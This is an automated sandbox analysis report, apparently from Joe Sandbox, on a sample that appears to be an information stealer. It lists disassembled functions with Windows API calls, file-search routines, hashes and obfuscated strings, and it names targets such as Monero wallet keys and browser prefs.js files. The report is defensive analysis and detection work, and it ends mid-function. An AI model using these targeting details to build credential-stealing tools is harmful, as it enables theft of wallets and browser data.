                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: 5f10421adf72ec61c6a7f44eb56fb8437146d0937ab71020aaeb7392205926e7
                  • Instruction ID: 2fcc4710b1e3327a06f17addbf87cc7a56930425bc8dbb52a63df05bf3b11df3
                  • Opcode Fuzzy Hash: 5f10421adf72ec61c6a7f44eb56fb8437146d0937ab71020aaeb7392205926e7
                  • Instruction Fuzzy Hash: 7FE1F2719121189AEB54FB60DD52EEE7338AF55310F4041E9B50A620D2EE306FCBEF92
                  Function 00C0F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C215B8,00C20D96), ref: 00C0F71E
                  • StrCmpCA.SHLWAPI(?,00C215BC), ref: 00C0F76F
                  • StrCmpCA.SHLWAPI(?,00C215C0), ref: 00C0F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0FAB1
                  • FindClose.KERNEL32(000000FF), ref: 00C0FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 07a962cff4c22c041119ea7605d1430b14da951e8ed0651e70167f3143119819
                  • Instruction ID: acaaf7dd905b518d6f961f45ba78f6a7492dcc6a45bd39695cd29c85b1c48221
                  • Opcode Fuzzy Hash: 07a962cff4c22c041119ea7605d1430b14da951e8ed0651e70167f3143119819
                  • Instruction Fuzzy Hash: 47B174719011189BDB24FF60DD95FEE7379AF55310F0081A8E40A961C1EF30AB8AEF92
                  Function 00FC7507 Relevance: 15.4, Strings: 11, Instructions: 1621COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /M {$?~{$Bw{g$C%z^$C%~Z$S v9$Whs~$d2j?$fv/$u/7}$+uq
                  • API String ID: 0-845356496
                  • Opcode ID: 8aac9f9471af05c8dc300e877ba7c807dfccb68be9c461831dbdb26a0124ecb2
                  • Instruction ID: 470dbbd4e881ec6c713657e24c3ad21bdfaa0da747170a82ccc21f9492cef5dc
                  • Opcode Fuzzy Hash: 8aac9f9471af05c8dc300e877ba7c807dfccb68be9c461831dbdb26a0124ecb2
                  • Instruction Fuzzy Hash: F7B206F390C600AFE304AF29EC8567AFBE5EF94720F1A892DE6C4C7744E63558418697
                  Function 00C016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C2510C,?,?,?,00C251B4,?,?,00000000,?,00000000), ref: 00C01923
                  • StrCmpCA.SHLWAPI(?,00C2525C), ref: 00C01973
                  • StrCmpCA.SHLWAPI(?,00C25304), ref: 00C01989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C01D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00C01DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C01E20
                  • FindClose.KERNEL32(000000FF), ref: 00C01E32
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 6d8804ceee2ce792dff3cce14b29af9684da01517cc64722c9750e818158e6da
                  • Instruction ID: b8cb26341e8da82b6f70688f9b23004c2d8d64cf9d37590005cbd495299da302
                  • Opcode Fuzzy Hash: 6d8804ceee2ce792dff3cce14b29af9684da01517cc64722c9750e818158e6da
                  • Instruction Fuzzy Hash: 9C124F719111189BDB19FB60DD96EEEB338AF55310F4041A9B50A620D1EF306FCAEFA1
                  Function 00C0DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C20C2E), ref: 00C0DE5E
                  • StrCmpCA.SHLWAPI(?,00C214C8), ref: 00C0DEAE
                  • StrCmpCA.SHLWAPI(?,00C214CC), ref: 00C0DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0E3E0
                  • FindClose.KERNEL32(000000FF), ref: 00C0E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 6e0d98912580bda5878179469707b0ce127b5468639484af9fa5e0de270fd7a5
                  • Instruction ID: 0c9d255c99b49eeb6cb7ec3051bfeb4a36ae9ccc579dc977302ba6f0786e5622
                  • Opcode Fuzzy Hash: 6e0d98912580bda5878179469707b0ce127b5468639484af9fa5e0de270fd7a5
                  • Instruction Fuzzy Hash: F7F19C718251189ADB25FB61DD95EEE7338BF15310F8041E9B41A62091EF306BCAEF62
                  Function 00C0DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C214B0,00C20C2A), ref: 00C0DAEB
                  • StrCmpCA.SHLWAPI(?,00C214B4), ref: 00C0DB33
                  • StrCmpCA.SHLWAPI(?,00C214B8), ref: 00C0DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00C0DDCC
                  • FindClose.KERNEL32(000000FF), ref: 00C0DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 72a005460576e448cbb5d7662c86eb9164213f4d277f01e266fd7c3bb5cb48fa
                  • Instruction ID: 18911df13f65777e5037347ba94e663af8109d8e5a8fe5bbbfc75846766e3784
                  • Opcode Fuzzy Hash: 72a005460576e448cbb5d7662c86eb9164213f4d277f01e266fd7c3bb5cb48fa
                  • Instruction Fuzzy Hash: 199174729001049BDB14FBB0EC56AED737CAF95310F448668F81A961C1EE349B8DEBD2
                  Function 00FCFD64 Relevance: 11.7, Strings: 8, Instructions: 1710COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !ZZ$$}{w$)Jo=$72o~$Mlu$O*$nzO$zgs
                  • API String ID: 0-2320539437
                  • Opcode ID: e81dbaf147290121e5a96d0c1c194fc9218affc1985dde3334fe68bcaac381fc
                  • Instruction ID: 5768cd1e4aaced29d19bd953a951e8e5ce7838c582c7d5e07b28499cd18467b5
                  • Opcode Fuzzy Hash: e81dbaf147290121e5a96d0c1c194fc9218affc1985dde3334fe68bcaac381fc
                  • Instruction Fuzzy Hash: 8BB219F3A082049FE7046E2DEC8577AFBE9EF94320F16493DEAC5C3744EA3558058696
                  Function 00FCAAC1 Relevance: 11.6, Strings: 8, Instructions: 1644COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: eP$$J>$3wQ$D>$To;z$w'<$w0Z$,ww
                  • API String ID: 0-3841678167
                  • Opcode ID: f3ad8d575c0e963cf46d9849112a20bfa35c7c0677d2b9b50996f964dee1635d
                  • Instruction ID: 78f650e1d44048c3e8bf2e643bc2b5101a5a4aee796b06ef621de033f43efadd
                  • Opcode Fuzzy Hash: f3ad8d575c0e963cf46d9849112a20bfa35c7c0677d2b9b50996f964dee1635d
                  • Instruction Fuzzy Hash: 7CB207F3A0C204AFE7086E2DEC8577ABBE5EF94720F16493DEAC4C3744E93558058696
                  Function 00C17B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,00C205AF), ref: 00C17BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00C17BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C17C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C17C62
                  • LocalFree.KERNEL32(00000000), ref: 00C17D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 23c8973ceafe100a94383b15e98a44246af88dcaff18504b28ada72247a243e7
                  • Instruction ID: 930cfbb1565b92ddfd68dd6e45b98c612f72f8bb18e46da367e527165394fcc2
                  • Opcode Fuzzy Hash: 23c8973ceafe100a94383b15e98a44246af88dcaff18504b28ada72247a243e7
                  • Instruction Fuzzy Hash: 1F414D71941218ABDB24DB55DC99BEDB374FF49710F204299E00962281DB346FC6EFA1
                  Function 00FC5AAE Relevance: 10.3, Strings: 7, Instructions: 1577COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 3snr$>vz?$C+S~$\V}$_UyW$sz$3
                  • API String ID: 0-161271779
                  • Opcode ID: 546e5b51917b4610e631e5350f837eda4bddf086532fefd96a6af379e2ab013b
                  • Instruction ID: 4e892daed10ac6594e248bb49109ddf011606707ef45e2e47565a1228a1958f6
                  • Opcode Fuzzy Hash: 546e5b51917b4610e631e5350f837eda4bddf086532fefd96a6af379e2ab013b
                  • Instruction Fuzzy Hash: 93B2F7F3A0C204AFD3146E2DEC85A7AFBE9EF94720F16493DEAC4C7744E63558048696
                  Function 00C0E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
